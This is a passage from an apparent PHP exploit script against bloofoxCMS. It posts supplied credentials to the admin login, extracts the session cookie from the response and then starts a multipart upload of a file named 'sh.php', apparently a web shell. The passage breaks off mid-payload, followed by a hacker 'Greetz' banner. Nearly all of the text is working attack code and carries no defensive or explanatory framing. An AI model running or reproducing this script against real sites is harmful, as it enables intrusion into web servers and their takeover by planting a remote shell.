\n"; print "\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "username={$argv[3]}&password={$argv[4]}&action=login"; $packet = "POST {$path}admin/index.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Referer: {$host}{$path}admin/index.php\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; $response = http_send($host, $packet); if (!preg_match("/Location: index.php/i", $response)) die("\n[-] Login failed!\n"); if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n"); print "\n..:: Login Successful ::..\n"; print "\n..:: Waiting hell ::..\n\n"; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n"; $payload .= "Content-Type: application/octet-stream\r\n\r\n"; $payload .= " ################################################################################################################ # Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################